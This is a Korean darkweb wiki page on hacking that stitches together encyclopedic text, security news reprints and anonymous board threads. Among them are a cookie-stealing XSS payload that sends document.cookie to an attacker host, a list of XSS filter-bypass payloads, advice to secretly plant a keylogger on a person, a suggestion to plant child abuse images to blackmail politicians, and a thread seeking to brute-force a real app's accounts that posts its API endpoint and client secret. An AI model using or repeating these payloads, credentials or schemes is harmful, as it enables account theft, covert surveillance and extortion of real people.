해킹

히든위키 딥웹 대마초
이동: 둘러보기, 검색
필독 유닠스 계열 저작물, 성인물, 도박 프로그래밍 웹 써버 보안 대화방
필독 사항 프로젴트 트라이던트 표면 웹 싸이트 제작 파이썬 리눅스 마스터 대화방 2019년
위키 편집 리넠스 마약, 아청물, 해킹 웹 프로그래밍 웹 싸이트 보안
위키 문서 작성법 우분투 다크넽 싸이트 제작 쟁고우 정보 보안 기사

개요[편집]

해킹(hacking)이란 hack이란 단어의 의미에서 알 수 있듯이 대상을 분해해서 작동 원리를 파악하는 것을 말한다. 크래킹crack이라는 단어 그대로 어떤 대상을 파괴하는 행위를 말한다. 해킹을 하는 사람은 해커(hacker)라고 부른다.


해킹 전체가 범죄는 아니다. 해킹의 원래 의미는 프로그램 원 제작자가 걸어놓은 프로그램 코드 락 알고리즘을 뚫어서 프로그램 소스를 알아내거나, 프로그램 소스를 변경하여 자기 입맛에 맞게 바꾸어 버리는 모든 행위를 포함한다. 코드 락을 뚫어서 프로그램 소스를 확인하기만 하는건 범죄가 아니다.[* 몇몇 열성적인 프로그래머는, 버그가 나버리면 프로그램 소스 락을 풀어 소스를 확인한 다음 어디가 틀렸는지 리포트를 써주기도 한다.][* 물론 이 소스를 그대로 베껴가는건 불법이다.] 또한 오픈 소스 프로그램이나, 상용 소프트웨어라도 프로그램 사용 계약 내용을 준수하며 프로그램을 개조한다면 불법이 아니다. 하지만 계약에서 벗어난 행위(모든 사람에게 공개해버리거나, 락을 풀어서 크랙을 만드는 등), 피해를 줄 목적으로 임의로 조작된 프로그램을 배포하는 등의 행위는 범죄이다. 이런 범죄행위는 크래킹, 그런행위를 하는 사람은 크래커 --과자아니다--라고 구분을 한다.

Mac OS X 운영체제에서는 해킹이 통하지 않는다는 인식이 있는데, 정확히 말하면 점유율이 타 운영체제보다 낮기 때문에 해커들이 별 관심이 없을 뿐이다. ~~관심 좀~~ XP가 보안에 약한 것은 오래된 OS라서[* 윈도우 XP를 아직 현역으로 사용하는 사람들이 많지만, IT기술의 빠른 발전속도를 감안한다면 낡았다고 볼 수 있다. 윈도우 XP는 이미 2008년에 단종된 운영체제임을 명심하자.] 낡은 보안체제를 가졌기 때문일 뿐으로(+여타 OS보다 2~30배 높은 점유율) XP의 보안을 가지고 윈도우즈 전체의 보안을 까는 건 어찌보면 병크라고 할 수 있겠다. 실제 해킹 대회에선 MAC이 가장 먼저 뚫리는 사례가 번번히 있다. 물론 윈도우의 보안이 아무리 MAC보다 좋아봤자 뚫는 사람이 워낙 많아서 제로데이 어택에 펑펑 뚫리는데다 XP가 아직도 대세인 윈도우측의 [보안]이 전체적으로 좀 더 약한 건 사실이므로 조금 더 주의하도록 하자.[* 특히 우리나라에서는 각 기관이나 인터넷 사이트에서 윈도우에 새로 추가된 보안 기능을 도로 끄라고 요구하는 실정인데, 이는 대개 ActiveX 때문이다. 덕분에 우리나라에서는 ActiveX로 된 보안 솔루션을 설치하기 위해 운영체제 수준의 최신 보안 기능을 해제해야 하는 촌극이 오늘도 어딘가에서 벌어지고 있다.]

몇몇 사람들은 영화나 몇몇 뉴스를 보고 해킹이 흥미나 자신의 능력을 시험하는 등의 이유로 행한다고 보는 경우가 있는데 당연히 현시창. 대다수의 해킹은 돈을 목적으로 하는 것이며(즉 크래킹) 대표적인 예가 중국에서 커뮤니티등을 해킹한 다음 돈을 요구하는 것이나, 러시아에서 악성코드에 감염된 봇넷을 가지고 DDoS 공격을 가하겠다고 기업들을 협박하여 돈을 뜯어내는 것[* 이런 종류의 범죄는 현재 범죄조직에 의해 철저한 분업화가 되어 있으며, 이를 통해 몇 시간 단위로 악성코드를 바꾸어 백신이 미처 대응하지 못하도록 만들도록 하는 모습까지 보인다.]다.


제일 흔한 해킹 수법이 SQL 인젝션이다.


해킹이나 보안에 대해 공부하고 싶다면 해킹 툴이 포함된 칼리 리눅스를 설치해보는 걸 추천한다.


  • 해킹도 종류가 3가지임

웹해킹

시스템해킹

리버싱

웹이랑 리버싱은 요새 클플방화벽떄매 어중이 떠중이는 접는추세 토토해킹하면 돈개꿀로 범 시스템해킹은 써먹을때가 없음 리버싱은 패킹프로그램 ㅆㅅㅌㅊ라 뚫기가 힘듬 특히 가상화 걸려있으면 지옥가버림

관심있는거로 찾아서 공부하셈

http://c2djzrn6qx6kupkn.onion/res/51955.html#52033

싸이트 목록[편집]


해킹 기법[편집]

네이버 클라우드에 지 남친이랑 찍은거 있다던데 함 확인해보고 찾으면 올릴게


몰래 key logger 하나 깔아라

이메일이나 카톡으로 다른 프로그램이나 으로 위장해서 보내든, pdf 파일이나 hwp, docx 문서 프로그램 보안 취약점을 이용하든, 걔 이나 에 니가 직접 몰래 깔든, 어떻게든 깔면 됨.

http://c2djzrn6qx6kupkn.onion/res/47979.html



code injection[편집]

SQL injectioncode injection 기법은 코드 인젴션 문서 참조.


cross-site scripting[편집]

크로쓰 싸이트 스크맆팅(XSS, cross-site scripting)은 월드 와이드 웹 상에서 가장 기초적인 취약점 공격 방법의 일종으로 악의적인 사용자가 공격하려는 사이트에 스크립트를 넣는 기법을 말한다. 공격에 성공하면 사이트에 접속한 사용자는 삽입된 코드를 실행하게 되며[* 사용자 입장에서는 삽입된 코드가 원래부터 존재하는 코드인지 아닌지 분간 할 수 없다.], 보통 의도치 않은 행동을 수행시키거나 쿠키나 세션 토큰 등의 민감한 정보를 탈취한다. --싸이월드 방문자 추적기의 원리--

주로 자바스크맆트를 이용한 공격이 대표적이나 HTML 태그의 속성을 이용한 공격방식 등 여러 방식이 존재한다. 공격 방법이 단순하고 가장 기초적이나 많은 웹사이트들이 크로쓰-싸이트 스크맆팅에 대한 방어 조치를 해두지 않아 공격을 받는 경우가 많다. 여러 사용자가 접근 가능한 게시판 등에 코드를 삽입하는 경우도 많으며, 경우에 따라서는 스팸메일을 통해서도 전파된다.

물론 HTML을 사용하는 것이기 때문에, HTML관련 기능을 사용하지 않는 게시판이나 위키위키 등에서는 XSS가 발생할 일이 없다(...) 단, 나무위키의 경우 {{{{{{#!html 코드}}}}}} 을 이용해서 HTML 태그를 사용할 수 있으므로 취약점이 있을 수도 있다. 그래서 나무위키 초반에는 script 태그도 막지 않고 on* 속성도 막지 않았으나, 이는 후에 대부분 수정되었다.

주로 CSRF를 하기 위해서 사용되기 때문에 종종 CSRF와 혼동되는 경우가 있으나, XSS는 자바스크립트를 실행시키는 것이고, CSRF는 특정한 행동을 시키는 것이므로 다르다.

예시[편집]

대표적인 공격 방법으로는 input 폼에 악의적인 스크립트들을 삽입하는 방법이 있다.

Cookie.php : {{{<? fwrite(fopen("XSS.txt","a+"), $_GET['cookie']); ?>}}}

삽입 스크립트 : {{{<img src="#" onerror="location.href('http://hack.er/Cookie.php?cookie=' + document.cookie);">}}}

위처럼 해커의 홈페이지에 Cookie.php라는 파일을 만들고, 공격할 사이트에 다음과 같은 스크립트를 넣어 놓으면 사용자가 게시물을 확인할 때 쿠키값이 해당 사이트로 전송되며 이를 통하여 쿠키에 중요한 값들을 저장하는 경우[* 만들어진지 조금 오래된 SSO모듈의 경우 세션이 아닌 쿠키를 이용하여 값을 검증하는 경우도 있다] 본인의 계정이 자기도 모르는 사이에 털리는 경우가 발생한다. 하지만 세션으로 저장해도 자신이 로그아웃하기 전에는 그 세션이 유효하기 때문에, 세션이 끝나기 전에 해커가 그 세션으로 접속한다면... 망했어요. --하지만 요새는 대부분의 사이트에서 on*을 필터링하기 때문에 이정도로 털린다면...--

사용자 7계명[편집]

OWASP는 XSS 공격을 방지하는 7계명을 발표하였다.

0. 절대로 허용된 위치가 아닌 다른 위치에 신뢰할 수 없는 데이터가 들어가는것을 허용하지 말아라 1. 신뢰할 수 없는 데이터에 대해서는 치환 처리를 하여라 2. HTML 속성에 신뢰할 수 없는 데이터가 들어갈 수 없도록 하여라 3. 자바스크립트에 신뢰할 수 없는 값이 들어갈 수 없도록 하여라 4. CSS에서 모든 신뢰할 수 없는 값에 대해서 검증하여라 5. URL의 경우에도 파라미터에 신뢰할 수 없는 값이 있는지 검증하여라 6. HTML 코드를 전체적으로 한번 더 검증하여라

기법[편집]

아래는 한국에서 가장 많이 사용되는 IE 기준으로 작성한 것이다. 따라서 크롬, 파이어폭스 등에서는 작동하지 않을 수도 있다. 실험은 []에서 해보자.


||방법||우회를 하고 script를 그대로 사용한다.|| ||예제||{{{<}}}{{{script>alert('XSS');</script>}}}|| ||설명||이렇게 하면 막는 경우가 많아 최근 만들어진 대부분의 사이트, 아니 모든 사이트에서 사용 불가능하다고 보면 된다. 하지만 만들어진지 정말정말정말 오래 되었거나, 보안 좆까! 하면서 막지도 않는 경우도 있다. --애초에 비밀번호를 MD5로 저장하거나 평문으로 저장하는 경우도 있는데 새삼스럽게...--||


||방법||script 태그를 막는다면 다른 태그로 한다.|| ||예제||{{{<a href="javascript:alert('XSS')">XSS</a>}}}|| ||설명||정말 옛날 사이트거나 관리자가 보안에 그다지 신경쓰지 않는다면 script만 막고 땡인 경우도 있다.||


||방법||javascript 사이에 공백 문자, 탭 문자, 혹은 개행 문자를 넣는다.|| ||예제||{{{<img src="j}}}[br]{{{avascr ipt:alert(1)">}}}|| ||설명||그냥 javascript: 에서 공백/탭/개행 문자를 중간중간에 넣어주면 된다.||


||방법||on~ 속성을 사용한다.|| ||예제||{{{<img src="#" onerror="alert('XSS')">}}}|| ||설명||이 역시 위와 같다. 자주 쓰이는 것들은 onload, onerror, onmouseover 등이다.||


||방법||잘 사용되지 않는 태그를 사용한다.|| ||예제||{{{XSS}}}|| ||설명||간혹 자바스크립트를 일부 태그에서 사용될 경우만 막는 경우도 있다(...) {{{<img src="javascript:alert('XSS')">}}} 는 막으면서 위의 예제는 안 막는 경우라던가...||


||방법||[[1]]에서 자바스크립트 난독화.|| ||예제||{{{너무 길어 미포함}}}|| ||설명||스크립트를 실행시키는 것 까지는 성공했으나 document.cookie 같은 것들을 막을 경우 사용가능한 방법이다. 자바스크립트를 []()!+ 만으로 바꾸어주는 아무래도 미친 것 같은 사이트다(...)||


||방법||따옴표 안에 있는 문자들은 HTML 인코딩을 해서 필터가 어렵게 만든다.|| ||예제||{{{<img src="javascript:alert('XSS')">}}}|| ||설명||<img src="javascript:alert('XSS')"> 라는 코드가 있다면, javascript:alert('XSS') 부분을 HTML 인코딩을 한다.||

방어 방법[편집]

JAVA기반 웹 어플리케이션의 경우, web.xml에 필터를 선언하여 모든 파라미터가 해당 필터를 거치도록 하고 해당 필터에 적절한 필터링 스크립트를 삽입하는것 만으로도 충분한 효과를 볼 수 있으며, 서버나 DB에 저장된 데이터를 내려서 사용자의 웹페이지에 뿌려줄 때에도 한번 필터링을 하는것이 적합한 방법이다.

PHP의 경우, input들을 처리함에 있어서 preg_replace를 이용하거나 DOMDocument를 이용해서 부적절한 스크립트와 태그를 차단할 수 있다.[* 속도는 정규표현식을 이용하는 preg_replace쪽이 빠르지만 안정성은 DOMDocument쪽이 우세하다.]

이 때 치환되거나 필터링 되는 대상 중 가장 흔한것이 < 와 >를 각각 {{{<}}} 와 {{{>}}} 처럼 치환하기도 하며, 아예 필요에 따라서는 <script> 라는 절이 들어오면 아에 에러처리 하는것도 한가지 방법이다. 또한 on* 속성을 차단해도 좋다.

그리고 흔히 하는 것이 일부 태그 및 속성만 막는 경우인데, 반대로 일부 태그 및 속성만 허용하게 하는 것이 좋다. 몇몇 태그만 막는다면 HTML 태그나 속성이 추가될 수록 주기적으로 필터를 수정해줘야 하는데, 이럴 바에야 차라리 일부 태그만 허용하는 게 좋기도 하고, 공격할 때 개발자가 상상하지 못한 별별 방법을 다 쓰기도 하기 때문에...

그 이외에 이미 배포된 방법을 이용하고자 하면 [[2]]에서 배포하는 [모듈]이나 ESAPI등을 이용하는 방법이 있다.


GPG 해킹[편집]

그누 프라이버시 가드(GPG)


  • 한끼 식사로 암호화 키를 훔치는 가장 완벽한 방법 2015.06.23

이스라엘 연구원들이 피타 브레드(Pita Bread)를 이용해서 컴퓨터에 저장된 암호화 키를 훔쳐낼 수 있는 빠르고 저렴한 방법을 고안했다고 밝혔다.

이들이 발표한 최신 논문에서는 컴퓨터가 계산을 수행하는 과정에서 파장되어 나오는 전기적인 신호를 기반으로 암호 키를 분석한다고 쓰여있다. 이는 일반적으로 부채널 공격(Side Channel Attack)으로 알려졌다.

연구진들은 전기적 신호를 분석하여 키 입력값을 추론함으로써 사용자가 어떤 애플리케이션을 사용하는지 유추하거나 파일이나 이메일을 암호화하는 데 사용된 비밀 암호화 키를 찾을 가능성을 입증했다.

이 연구진은 RSA와 엘가말(Elgamal) 키 암호화 알고리즘을 사용하는 오픈소스 암호화 프로그램인 GnuPG 1.x를 구동하는 노트북에서 암호화 키를 수집하는 데 주력했다. 이들은 GnuGP의 개발자인 워너 코흐에게 해당 논문에 관한 소식을 전했다고 이야기했다.

연구원들은 50cm 떨어진 전자기적 신호를 모으는 장비를 피타 브레드안에 숨겼다. 이 장치의 이름은 PITA(Portable Instrument for Trace Acquisition)로, 루프 안테나로 덮지 않은 구리와 암호화 키 정보를 유출할 수 있는 1.7MHz 범위의 주파수를 엿들을 수 있도록 설계된 커패시터로 구성돼 있다.

내장 마이크로 SD카드에 수집된 신호를 토대로 오프라인 분석을 하면 수 초 만에 암호화 키를 유추할 수 있다.

공격의 한 부분으로, PITA 기기는 암호문이나 암호화된 콘텐츠를 컴퓨터로 전송한다. 컴퓨터가 해당 콘텐츠를 복호화하면, 눈으로 볼 수 있는 전자기 신호를 내보낸다.

해당 논문은 “신호 처리 및 암호 해독을 통해 이와 같은 파동으로부터 암호화키를 추정할 수 있다”고 말했다.

이 연구진들은 또한 이 신호를 모을 수 있는 두 번째 기기도 설계했다. 1.7MHz 진동수가 AM 라디오와 같은 주파수대역을 사용한다는 점에서 연구원들은 로드 마스터(Road Master)라고 불리는 상업용 수준의 라디오 리시버를 사용했다.

연구진은 HTC 에보(EVO) 4G 스마트폰의 마이크 입력에 연결하고 신호를 기록했다고 밝혔다.

피타 브레드를 주문할 때 알루미늄 호일 패키지에 감싸서 제공되므로, 안에 전자 기기가 포함돼 있는지 확인하기가 어렵게 된다. 이 때문에 이와 같은 부채널 공격을 미리 차단하는 것은 방지하기 어렵게 된다.

패러데이 상자(Faraday Cage)를 이용하면 전자기적 신호를 차단할 수 있는 것으로 알려졌다. 그러나 일부 사용자만이 패러데이 새장에서 작업하는 것으로 알려졌다. PC 제조업체들은 가격이 비싸다는 이유로 자사 하드웨어에서 해당 문제를 해결하려는 노력을 보이지 않고 있다.

차라리 소프트웨어를 재정비하는 것이 더 나은 접근방식일 수도 있다. 알고리즘과 소프트웨어는 유출된 신호가 유용한 정보를 유출하지 않는 방식으로 바꿀 수 있다. 연구원들은 이와 같은 변화를 만들기 위한 작업을 벌써 진행 중이라고 설명했다.

논문에서 “사실, 소프트웨어 구현에서 부채널 공격에 관한 저항은 현재 주요 이슈로 부상했다”고 말했다.

http://www.itworld.co.kr/news/94148


backdoor shell[편집]

뱈도어 셸 (backdoor shell)


  •  ? ㅇ 19/02/02(Sat)09:42:50 No.50960

dl.free 왜 다운이 안되냐 뭔 설정이 필요한 거냐 왜 안되는거지 다른거 다 잘되는데;;


Anonymous 19/02/02(Sat)19:05:42 No.50979 뭗씨발 다운로드를 한다고? 정신나간새끼


Anonymous 19/02/03(Sun)01:14:47 No.51005 다운로드 받으면 안대냐? 웹쉘 제작하는새끼 있길래 궁금해서 받았는데


51005 Anonymous 19/02/03(Sun)01:33:23 No.51013 >>51005 웹쉘이머냐?


Anonymous 19/02/03(Sun)01:36:00 No.51014 웹쉘도 모르면 얼마나 병신새끼인거지?ㅋㅋㅋㅋㅋㅋ


Anonymous 19/02/03(Sun)20:42:40 No.51070 웹 셸(web shell)은 업로드 취약점을 통하여 시스템에 명령을 내릴 수 있는 코드를 말한다. webshell은 간단한 서버 스크립트 (jsp,php,asp ..)로 만드는 방법이 널리 사용되며 이 스크립트들은 웹서버의 취약점을 통해 업로드 된다. 웹셀 설치시 해커들은 보안 시스템을 피하여 별도의 인증없이 시스템에 쉽게 접속 가능하다.

(서버에서 구동되고 있다 하여도 취약점이 존재하지 않으면, 수행되지 않으며 만약 업로드되었다 하더라도 실행 권한이 없으면, 실행이 되지 않는다. 하지만 취약점과 실행권한이 존재할 때는 서버 내부에 명령을 수행할 수 있으므로 침해 범위가 넓어 질 수 있다.)

사용자로부터 입력된 시스템 명령어에 전달하는 기능을 가지고 있다.

http://c2djzrn6qx6kupkn.onion/res/50960.html

해킹 사례[편집]


  • 해킹 사건이 나도 kt 같은 기업들이 뻔뻔하게 나오는 이유 2014.03.08

아래와 같이 법조항 찬찬히 보시면 밑에 있는 법조항만 잘지키면 기업은 법정소송에서 면책사유가 발생합니다. 자세히 생각해보시면 정말 어이 없을수도 있다는 생각이 드실수도 있습니다.

기업에서는 법정소송에서 가면 "정부에서 하라고 하는데로 했는데 우린 잘못없다!"는 식으로요.... 그리고 사고가 나면 기업에 대해 책임을 묻는 법규도 없습니다. 저렇게 금융위원회에서 "sql인젝션 인젝션 공격에 대해 보안 대책을 세울것" 저렇게 일일이 정해주면 기업은 그 규정만 따를뿐 다른 보안 취약점이나, 새로운 해킹공격에는 신경 안씁니다. 초보적인 해킹공격에 뚤리는 공격이라도요. 정부는 자기네들 하라는것만 지키는지, 자기네 근본적인 법제도가 허술한지 모릅니다.

http://gigglehd.com/zbxe/11187648


  • 기업이 보안에 돈을 쓰지 않는 이유 2014년 7월 28일

보안 전문가나 회사에 지불하는 돈보다 보안으로 인해 문제가 생기면 벌금을 내는 게 저렴해진 상황은 마치 그레셤의 법칙("악화가 양화를 구축한다." = "나쁜 돈이 좋은 돈을 몰아낸다.")이라고 할 수 있다.

보안업계도 문제지만 결정적으로 기업이 이번 벌금의 판례로 제대로 된 학습 효과를 보게 된 것은 아닌지 모르겠다. 기업 입장에선 고가의 장비보다 인증을 통과한 저렴한 장비와 최소한의 인력 투자만 하게 될 것이 분명하다.

http://techholic.co.kr/archives/19467


  • 카드결제단말기 노린 초소형 스파이 악성코드 국내 유입 2016-01-16

2KB~4KB의 초소형 악성코드, 단계별로 사용자 감염시켜

POS 내 카드정보 식별표준에 맞게 카드정보 검증 및 수집

POS와 연결된 PC에서 웹서핑 자제해야

악성코드는 100KB가 넘는 크기(용량)를 갖는 것이 일반적이지만, 이번에 발견된 POS 악성코드는 2~4KB의 아주 적은 ‘초소형 스파이 악성코드’다. 해당 악성코드는 지난해 4월 국내에 최초 상륙한 것으로 분석된다.

해당 악성코드는 DBD(Drive By Download) 방식으로 유포됐다. 주로 워드프레스로 구성된 국내 쇼핑몰 웹사이트 및 광고 배너를 통해 사용자들을 감염시켰다.

DBD 방식이란 사용자 PC에 설치된 프로그램의 취약점을 이용해 사용자가 알지 못하는 사이 악성코드에 감염시키는 방식이다. 이는 지난해 많은 피해자를 양산한 랜섬웨어 악성코드가 유포될 때 간간히 함께 유포된 것으로 알려졌다.

또한 최 실장은 “주로 어도비 플래시(Adobe Flash)와 IE(Internet Explorer) 취약점을 이용해 웹서핑 도중 DBD 방식으로 감염되기 때문에 POS기에서는 절대로 카드 결제 업무 외에 웹서핑을 자제해야 한다. POS기에도 반드시 백신을 설치하고, 설치된 프로그램들을 최신 버전으로 업데이트해야 한다”고 당부했다.

http://www.boannews.com/media/view.asp?idx=49240&kind=1


호텔 이용객 해킹[편집]

  • '다크 호텔'의 위험

2014년 11월 21일

5성급 호텔에 투숙한 엘리트를 작정하고 노린 정보보안 집단범죄의 정체가 드러나다.

소위 '다크 호텔 APT' 사건.

'APT'는 Advanced Persistent Threat의 약어로서 흔히 '지능형 지속 위협'으로 번역된다. 어감이 어째 좀 '무섭긴 한데 그게 뭔지 정체는 모르겠음'의 뜻을 품고 있는 듯하고, 실제로도 대략 그러하다.

APT란, 금전적이든 정치적(이라고 해도 대개 실상은 금전적)이든 특정한 목적을 달성하기 위해 공격대상을 정해 두고 장기간에 걸쳐 지속적 공격을 가해 허점을 발견하고 목표했던 바 정보를 탈취하거나 파괴하는 등의 공격을 말한다. 노리는 바가 비싼 정보다 보니 흔한 해킹 수법으로 그치지 않고 '사회공학' 등 여타 수법을 총동원하는, 일종의 정보범죄 총동원령이라 할 수 있다.

사회공학이란, 전통적 도청이나 IT기술 등 기술적 수법이 아니라 사람과 사람 사이의 신뢰를 기반으로 어떤 사람을 속여 정보에 접근하는 수법을 말한다. 사람과 사람 사이 선의에 의한 상호작용을 악용한다는 점에서 죄질이 매우 나쁘다. 하지만 수법의 효율성만 따지자면 매우 효과적인 접근방법이라 보안수준이 높은 곳일수록 사회공학 없이는 접근이 불가능할 정도.

'다크 호텔' 건에서 사회공학의 도구는, 호텔 자체의 높은 신용도다. 살펴보자.


정보의 값

이들은 미리 고급 호텔에 잠입해 밑작업을 해 두고 먹이를 기다린다. 일본>대만>중국>러시아>한국 순으로 많은, 주로 아시아 지역의 고급 호텔에 투숙하는 방산 금융 자동차 제약 등 정보가치가 높은 회사의 C레벨급 임원진과 최고위급 연구원이 먹잇감이다. 주요국가 고위당국자와 세계적으로 영향력이 큰 비정부기구 NGO 간부도 적절한 표적.

비싼 정보만 골라서 노렸다는 점이 가장 중요하다. 2011년 2월 16일 서울 소공동 롯데호텔에서 일어났던 인도네시아 특사단 숙소 침입사건만 보더라도, 호텔에 투숙하는 외국 엘리트가 가진 정보의 가치는 '노릴 만하니까' 노리는 자들이 많다.


브랜드 신뢰성 악용

'비싼 사람들'이 비싼 호텔에 머물며 호텔 공용 와이파이(Wi-Fi) 네트워크에 접속하면, 접속을 위해 입력한 객실 번호를 통해 신원을 파악한다. 호텔이 통째 이미 털렸으니 신원 확인이 어려운 일도 아니다. 싼 사람은 건드리지 않는다. 이건 순전히 비즈니스니까. 괜히 아무나 건드려 봐야 얻을 게 없고 또 발각 위험만 커지기 때문이다.

그리고 인터넷 사용을 위해 필요하다며 구글, 마이크로소프트, 어도비 등 유명한 회사의 이름을 도용한 가짜 팝업 창을 띄운다. 대개 의심 없이 '확인'을 누른다. 혹시 의심한다더라도 일본어 중국어 한국어를 모르니 그냥 누를 수밖에 없다. 외국의 분위기에 따른 소위 '객기'도 방심의 이유다. 클릭 즉시, 백도어가 설치된다.

https://www.huffingtonpost.kr/pakghun/story_b_6196828.html


아동포르노 심고 협박하면 꿀잼

한국 정치인들 그렇게 협박해서 연가시감염사마귀처럼 조종해야 되는데 ㅋㅋ


이재명이나 박원순처럼 다음 대 대통령 될 가능성 높은 사람을 조종해야지. 최순실 꿀잼.ㅋㅋㅋ

예전에 미국 FBI 국장이 존 에드거 후버였을 때 그 새끼가 다음 대 유력 대선 후보 미행하고 도청하고 해서 약점 수집해서 조종했잖아. 그 새끼 FBI 국장 48년 함. 대통령들이 약점 잡혀서 못 짜름. 결국 그 새끼 늙어죽을 때까지 FBI 국장 함. 스파이 색출 한다는 명분으로 광범위한 도감청 하고.

http://c2djzrn6qx6kupkn.onion/res/42877.html


혼자서 해킹을 공부하는 방법[편집]

해킹을 혼자서 공부하고 싶으면 우선 컴퓨터에 칼리 리눅스 깔아서 쓰면서 "리눅스 마스터 1급"부터 따면 좋다. 리눅스의 구조와 터미널에서 쓰이는 명령어를 공부할 수 있기 때문이다. 또한 해커들이 해킹하려는 웹 서버의 대다수는 유닉스 계열(비에스디(BSD), 리눅스 등)이기 때문에 유닉스 계열 운영 체제를 공부해야 해킹을 할 수 있다.


칼리 리눅스에 아파치(Apache), 피에이치피(PHP), 마이에스큐엘(MySQL)을 깔고, 피에이치피비비(phpBB)나 적당한 웹 사이트를 하나 만들어서 운영해보면서 직접 웹 서버에 대해 배우는 게 좋다. 웹 서버를 해킹하려면 먼저 웹 서버가 어떻게 작동하는지, 데이터베이스(DB)나 구조화 질의 언어(SQL)가 뭔지 알아야 하기 때문이다. 그리고 정보보안기사[1]도 따면 해킹에 대해 기초는 뗐다고 할 수 있다. 여기까지 완료했으면 그 다음은 자기가 하기 나름이다.


  • 형들ㅎㅇ 슈퍼해커 18/09/22(Sat)10:43:52 No.44790

머학 1학년 다니고 휴학중인데 해킹/보안쪽으로 가고싶은데 뭐 배워야할지 모르겠음

형님들 이런쪽에 박식한거 같은데 커리큘럼좀 짜주세요

몬 개어미 짬지만지는 소리야? 분류조차 하지 못할거면 도대체 뭘 어쩌라는거 씹새끼야 해킹보안 이러면 누가 알아쳐 먹어 씨발려나 적어도 시스템 네트워크로 나눠써 씨발 기분 잡쳤네


몇가지를 두고 작정하고 파기에는 내가 전문적으로 아는것도 별로없고 많이 젊은거같아서 넓은범위에서 전문가의 견해를 들어보고 싶었음

당장엔 콘솔/모바일, 각종 임베디드 시스템 해킹에 흥미가 있지만, Iot가 보편화되면 네트워크 분야도 필연적이라고 생각해서 네트워크 쪽에도 어느정도 관심두고 있음.


해킹 / 보안

후장뚫고싶냐 / 후장막고싶냐

방법이 같냐 ?

// 뭘 하든 네트워크가 기본이다


네턱은 배운다고 되는게 아님

직접 부딛혀보고 서비스도 운영해보고 개삽질해보고 하면서 느는거지

네트워크 배운 새끼 특징)실전에서 애미가 뒤짐


지금당장은 뚫는것에 관심이 있긴한데, 나중에 정규직으로 떳떳하게 먹고사는건 역시 막는거니깐 역시 막는것에도 흥미가 있음.

지금 전부 관심있는 상태라서 질문하는주제에 답변하기 어렵게 질문한건 미안해.

여튼 네트워크가 기본이라니깐 생각 정리할겸 일단은 네트워크쪽을 공부해야겠네 ㅎㅎ

네트워크 기초교재나 강의 추천좀 부탁할게


기초적인 교재라면 '정보 보안 기사'랑 '리눅스 마스터' 교재 봐라


일단 리눅스 서버에서 웹 사이트 운영부터 해봐


서버 해킹하려면 BSD같은 Unix도 알긴 해야 함. runlevel 등 Linux랑 약간씩 다른 부분이 있음.


은행같은데서 유닉스 많이 쓰고. 은행에서 예전에 메인프레임 쓰다가 유닉스로 넘어온 거. 리눅스 쓰는데는 카카오뱅크 하나 있음.

은행권 외에는 서버로 리눅스도 많이 쓰고.

마이크로소프트에서는 예전엔 hotmail 서버로 FreeBSD 쓰다가 윈도우즈 서버로 넘어갔고.


남의 웹 사이트 해킹하려면 일단 니 웹 사이트 운영부터 해봐야지


개발자프로그래머도 아니고 해커면 존나게 비생산적인 일임. 개발자는 뭔가 유용한 새로운 걸 만들지만, 해커는 기껏해봤자 남의 집 문 따는 기술 배우는 거임.


https://namu.moe/w/SQL%20injection

https://namu.moe/w/XSS

https://namu.moe/w/CSRF

SQL injection, XSS, CSRF가 가장 흔한 해킹 수법이니까 위 문서들부터 읽어봐라.


9시 뉴스에 나오는 해킹 사건의 절대 다수가 이 방법들로 이루어짐.



쿠라 스시 해킹 시도[편집]

  • 능력자형님들 19/02/03(Sun)06:13:29 No.51038

식당예약 어플인데 아이디를 알경우 비번 알아낼수있는 형님있어요? 소정의 사례비는 드리겠습니다.


Anonymous 19/02/03(Sun)06:28:51 No.51039 어쩌다 너같은 병신이 여기까지온거냐


ㅋㅋㅋㅋㅋ ㅋㅋㅋㅋ 19/02/03(Sun)09:23:57 No.51041 ㅋㅋ다짜고짜 이러는 애들은 진짜 얼마나 멍청한거냐


Anonymous 19/02/03(Sun)17:10:05 No.51055 다짜고짜 어플 계정을 원하는거 보니까 정상적인 사람은 아닌거 같은데 소정의 사례비 이러는걸 보면 진짜 아무것도 모르는 순수한 사람인가? 정확히 어떤건지 정보를 줘야 길가던애들이 쳐다 보기나할텐데 말이야 서버를 줘패던 패킷을 납치해서 복호까지 노가다 하던 이런건 스스로해라 책잡히지말고

http://c2djzrn6qx6kupkn.onion/res/51038.html



  • 능력자형님들 19/02/03(Sun)19:42:45 No.51059

쿠라스시(くら寿司) 예약어플이고 일본ip로만 접속가능

여기서 가입하면 결국 뚫어야 하는건 epark api 서버입니다. 서버 주소는 54.199.173.77:443

https://v1.eparkapi.jp/1/member/oauth/token.json 얘로 로그인 하는데 비밀번호 오류 카운트 안합니다

api 키값은 client_id: kura_app, client_secret: a110cb214b154b2ca6428631cc3f207e

이거 아이디하나아는데 비번알아낼수 있는지 한번 봐주시면 감사하겠습니다ㅠㅠ!


Anonymous 19/02/03(Sun)20:17:43 No.51060 저렴하고 맛있는 회전초밥 "쿠라스시"의 지점정보. 한 접시 100엔이라는 가격과 다양한 메뉴, 위생관리도 완벽해, 게임까지 할 수 있는 가족들과도


Anonymous 19/02/03(Sun)20:23:56 No.51061 443ㅋㅋ인스턴스 안에있는 방화벽 주소자너ㅋㅋ병ㅋㅋ


Anonymous 19/02/03(Sun)23:33:07 No.51080 >>51061 병신아 https 포트도 못알아보냐? api가 https니까 저렇게 써놓은거지


형님들... 19/02/04(Mon)00:11:32 No.51082 가능하신분있으신가요?ㅠㅠ


Anonymous 19/02/04(Mon)00:43:42 No.51087 >>51080 aws인스턴스 구성을 모르시나보네요 ㅎㅎ ssl 중앙에서 나오는 서버를 몸체라고 생각하시는거에요?ㅎㅎ


Anonymous 19/02/04(Mon)01:01:20 No.51092 >>>51087 형님 영숫자8~16은 확실하구요 혹시 가능하십니까ㅠㅠ부탁올립니다


Anonymous 19/02/04(Mon)02:26:24 No.51100 서버해킹 가능하신분 없을까요? 해킹관련 마켓도 없고... 능력자형님들 조언부탁올립니다...


Anonymous 19/02/04(Mon)03:50:49 No.51108 나 코챈에 댓글 달아준 게이인데 서버 주소 저거 아니라 https://203.131.199.71/1/member/oauth/token.json 여기다


Anonymous 19/02/04(Mon)04:57:20 No.51114 >>51108 형님 어찌안될까요... 부탁올립니다ㅠ


Anonymous 19/02/04(Mon)04:59:42 No.51115 >>51108 형님 어찌안될까요... 부탁올립니다ㅠ일게이형님이십니까ㅠ 부탁드려요ㅠ


Anonymous 19/02/04(Mon)06:18:30 No.51118 >>51115 아니 난 해커 아니라고. 안해주는게 아니라 못해주는거임

